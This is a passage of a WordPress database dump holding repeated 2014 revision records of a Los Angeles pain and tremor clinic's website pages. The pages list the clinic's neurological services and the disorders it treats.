here)</a></h3>\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-autosave-v1','','','2014-06-17 22:41:06','2014-06-17 22:41:06','',9,'http://theworstpain.com/Neuro/2014/06/17/9-autosave-v1/',0,'revision','',0),(27,1,'2014-06-17 22:12:19','2014-06-17 22:12:19','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</p>\r\n<p style=\"color: #424141;\"><b><a style=\"color: #204788;\" title=\"Contact us & locations\" href=\"http://www.fymdesignsco.com/neuro/contact-us-locations/\">Contact</a> us today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\nOur goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:\r\n<strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)\r\n• Electromyography (EMG)\r\n• Nerve Conduction Velocity Testing (NCV)\r\n• Electronystagmogram (ENG)\r\n• Neuropsychological testing\r\n• Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures\r\n• Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></p>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:12:19','2014-06-17 22:12:19','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(31,1,'2014-06-17 22:17:27','2014-06-17 22:17:27','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\nOur goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:\r\n<strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)\r\n• Electromyography (EMG)\r\n• Nerve Conduction Velocity Testing (NCV)\r\n• Electronystagmogram (ENG)\r\n• Neuropsychological testing\r\n• Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures\r\n• Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></p>\r\n<p style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></p>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:17:27','2014-06-17 22:17:27','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(29,1,'2014-06-17 22:15:36','2014-06-17 22:15:36','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</p>\r\n<p style=\"color: #424141;\"><b><a style=\"color: #204788;\" title=\"Contact us & locations\" href=\"http://www.fymdesignsco.com/neuro/contact-us-locations/\">Contact</a> us today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\nOur goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:\r\n<strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)\r\n• Electromyography (EMG)\r\n• Nerve Conduction Velocity Testing (NCV)\r\n• Electronystagmogram (ENG)\r\n• Neuropsychological testing\r\n• Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures\r\n• Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></p>\r\n<p style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></p>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:15:36','2014-06-17 22:15:36','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(30,1,'2014-06-17 22:16:00','2014-06-17 22:16:00','<h2 style=\"color: #204788; text-align: left;\"><img class=\"alignleft size-full wp-image-80\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74648877_scaled_166x238-1.jpg\" alt=\"74648877_scaled_166x238-1\" width=\"166\" height=\"238\" />What Is Pain?</h2>\r\n<p style=\"color: #424141; text-align: left;\">Pain is a natural response that acts as a warning to indicate harm or potential danger to tissues in our bodies.</p>\r\n<p style=\"color: #424141; text-align: left;\">When pain persists for more than six months and is not adequately relieved by standard medical treatments, it is said to be chronic or intractable. Such pain no longer serves a useful purpose for the body and instead makes normal living almost impossible, with depression as a common side effect. Depression often accompanies the pain and can become as disabling and demoralizing as the pain itself.</p>\r\n\r\n<h2 style=\"color: #204788; text-align: left;\">What Causes Chronic Pain?</h2>\r\n<p style=\"color: #424141; text-align: left;\">Chronic pain may result from an initial traumatic event that has long since healed. It may be related to nerve damage, and it may have an ongoing cause such as arthritis, cancer, infection, or any number of other ailments, including Parkinson’s Disease.</p>\r\n\r\n<h2 style=\"color: #204788; text-align: left;\">How Is Chronic Pain Treated?</h2>\r\n<p style=\"text-align: left;\">Treatment begins with systemic, nonsurgical techniques including pain medication, physical therapy, and pain management therapy. Most patients will respond to a combination of physical therapy, oral medication, and other conservative therapies. Some patients require surgery to treat the underlying mechanical condition that causes the pain, and others require more advanced surgical interventions to treat their chronic pain.</p>\r\n[full] [third flow=\"start\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Chronic Pain Procedures</h2>\r\n<ul>\r\n <li>Implantable Infusion Pumps</li>\r\n <li>Spinal Cord Stimulation</li>\r\n <li>Peripheral Nerve Stimulation</li>\r\n</ul>\r\n[/third] [third flow=\"hold\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Stereotactic and Functional Neurosurgery</h2>\r\n<ul>\r\n <li>Deep Brain Stimulation</li>\r\n <li>Additional procedures</li>\r\n</ul>\r\n[/third] [third flow=\"end\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Commonly Treated Disorders</h2>\r\n<ul>\r\n <li><span style=\"color: #000000;\">Low Back Pain</span></li>\r\n <li><span style=\"color: #000000;\">Facial Pain (Neuralgia)</span></li>\r\n <li><span style=\"color: #000000;\">Burning Pain as in RSD</span></li>\r\n <li><span style=\"color: #000000;\">Herpetic Neuralgia (Shingles)</span></li>\r\n <li><span style=\"color: #000000;\">Cancer Pains</span></li>\r\n <li><span style=\"color: #000000;\">Head Pains</span></li>\r\n <li><span style=\"color: #000000;\">Post-Surgical Spine Pain</span></li>\r\n <li><span style=\"color: #000000;\">Extremity Pains</span></li>\r\n <li><span style=\"color: #000000;\">Phantom Pain Post-Amputation</span></li>\r\n <li><span style=\"color: #000000;\">Pain after Stroke</span></li>\r\n <li><span style=\"color: #000000;\">Pain after Nerve Injury</span></li>\r\n <li><span style=\"color: #000000;\">Diabetic & Other Neuropathies</span></li>\r\n <li><span style=\"color: #000000;\">Pain from Multiple Sclerosis</span></li>\r\n <li><span style=\"color: #000000;\">Painful Paralysis</span></li>\r\n <li><span style=\"color: #000000;\">Painful Numbness</span></li>\r\n <li><span style=\"color: #000000;\">Parkinson\'s Tremors</span></li>\r\n <li><span style=\"color: #000000;\">Involuntary Movement Disorders</span></li>\r\n <li><span style=\"color: #000000;\">Rare Conditions</span></li>\r\n <li><span style=\"color: #000000;\">Back Pain</span></li>\r\n <li><span style=\"color: #000000;\">Spin Problems</span></li>\r\n <li><span style=\"color: #000000;\">Dizziness</span></li>\r\n <li><span style=\"color: #000000;\">Balance Disorders</span></li>\r\n <li><span style=\"color: #000000;\">Headaches</span></li>\r\n</ul>\r\n[/third] [/full]','Chronic Pain','','inherit','open','open','','17-revision-v1','','','2014-06-17 22:16:00','2014-06-17 22:16:00','',17,'http://theworstpain.com/Neuro/2014/06/17/17-revision-v1/',0,'revision','',0),(41,1,'2014-06-17 22:39:22','2014-06-17 22:39:22','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:</p>\r\n\r\n<ul>\r\n <li>Neurological and Neurosurgical Evaluations</li>\r\n <li>Qualified Medical Examinations (QME)</li>\r\n <li>Agreed Medical Examinations (AME)</li>\r\n <li>Neurodiagnostic Procedures\r\n<ul>\r\n <li>Electroencephalogrpahy & EEG)</li>\r\n <li>Electromyography (EMG)</li>\r\n <li>Nerve Conduction Velocity Testing (NCV)</li>\r\n <li>Electronystagmogram (ENG)</li>\r\n <li>Neuropsychological testing</li>\r\n <li>Vestibular Testing for Balance and Dizziness</li>\r\n</ul>\r\n</li>\r\n <li>Neurological and Neurosurgical Treatment\r\n<ul>\r\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\r\n <li>Implantable devices</li>\r\n</ul>\r\n</li>\r\n <li>Other Neurosurgical techniques</li>\r\n</ul>\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:39:22','2014-06-17 22:39:22','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(40,1,'2014-06-17 22:38:36','2014-06-17 22:38:36','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:</p>\r\n\r\n<ul>\r\n <li><strong>Neurological and Neurosurgical Evaluations</strong></li>\r\n <li><strong>Qualified Medical Examinations (QME)</strong></li>\r\n <li><strong>Agreed Medical Examinations (AME)</strong></li>\r\n <li><strong>Neurodiagnostic Procedures:</strong>\r\n<ul>\r\n <li>Electroencephalogrpahy & EEG)</li>\r\n <li>Electromyography (EMG)</li>\r\n <li>Nerve Conduction Velocity Testing (NCV)</li>\r\n <li>Electronystagmogram (ENG)</li>\r\n <li>Neuropsychological testing</li>\r\n <li>Vestibular Testing for Balance and Dizziness</li>\r\n</ul>\r\n</li>\r\n <li><strong>Neurological and Neurosurgical Treatment:</strong>\r\n<ul>\r\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\r\n <li>Implantable devices</li>\r\n</ul>\r\n</li>\r\n <li><strong>Other Neurosurgical techniques</strong></li>\r\n</ul>\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:38:36','2014-06-17 22:38:36','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(32,1,'2014-06-17 22:26:44','2014-06-17 22:26:44','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">Our Services Include:</span>\r\n<span style=\"color: #000000;\"> <strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)</span>\r\n<span style=\"color: #000000;\"> • Electromyography (EMG)</span>\r\n<span style=\"color: #000000;\"> • Nerve Conduction Velocity Testing (NCV)</span>\r\n<span style=\"color: #000000;\"> • Electronystagmogram (ENG)</span>\r\n<span style=\"color: #000000;\"> • Neuropsychological testing</span>\r\n<span style=\"color: #000000;\"> • Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures</span>\r\n<span style=\"color: #000000;\"> • Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></span></p>\r\n\r\n<h3 style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:26:44','2014-06-17 22:26:44','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(33,1,'2014-06-17 22:28:33','2014-06-17 22:28:33','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">Our Services Include:</span>\r\n<span style=\"color: #000000;\"> <strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)</span>\r\n<span style=\"color: #000000;\"> • Electromyography (EMG)</span>\r\n<span style=\"color: #000000;\"> • Nerve Conduction Velocity Testing (NCV)</span>\r\n<span style=\"color: #000000;\"> • Electronystagmogram (ENG)</span>\r\n<span style=\"color: #000000;\"> • Neuropsychological testing</span>\r\n<span style=\"color: #000000;\"> • Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures</span>\r\n<span style=\"color: #000000;\"> • Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></span></p>\r\n\r\n<h3 style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:28:33','2014-06-17 22:28:33','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(34,1,'2014-06-17 22:29:04','2014-06-17 22:29:04','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #333333;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">Our Services Include:</span>\r\n<span style=\"color: #000000;\"> <strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)</span>\r\n<span style=\"color: #000000;\"> • Electromyography (EMG)</span>\r\n<span style=\"color: #000000;\"> • Nerve Conduction Velocity Testing (NCV)</span>\r\n<span style=\"color: #000000;\"> • Electronystagmogram (ENG)</span>\r\n<span style=\"color: #000000;\"> • Neuropsychological testing</span>\r\n<span style=\"color: #000000;\"> • Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures</span>\r\n<span style=\"color: #000000;\"> • Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></span></p>\r\n\r\n<h3 style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:29:04','2014-06-17 22:29:04','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(35,1,'2014-06-17 22:29:10','2014-06-17 22:29:10','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">Our Services Include:</span>\r\n<span style=\"color: #000000;\"> <strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)</span>\r\n<span style=\"color: #000000;\"> • Electromyography (EMG)</span>\r\n<span style=\"color: #000000;\"> • Nerve Conduction Velocity Testing (NCV)</span>\r\n<span style=\"color: #000000;\"> • Electronystagmogram (ENG)</span>\r\n<span style=\"color: #000000;\"> • Neuropsychological testing</span>\r\n<span style=\"color: #000000;\"> • Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures</span>\r\n<span style=\"color: #000000;\"> • Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></span></p>\r\n\r\n<h3 style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:29:10','2014-06-17 22:29:10','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(36,1,'2014-06-17 22:30:41','2014-06-17 22:30:41','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #333333;\">Our Services Include:</span>\r\n<span style=\"color: #333333;\"> <strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)</span>\r\n<span style=\"color: #333333;\"> • Electromyography (EMG)</span>\r\n<span style=\"color: #333333;\"> • Nerve Conduction Velocity Testing (NCV)</span>\r\n<span style=\"color: #333333;\"> • Electronystagmogram (ENG)</span>\r\n<span style=\"color: #333333;\"> • Neuropsychological testing</span>\r\n<span style=\"color: #333333;\"> • Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures</span>\r\n<span style=\"color: #333333;\"> • Implantable 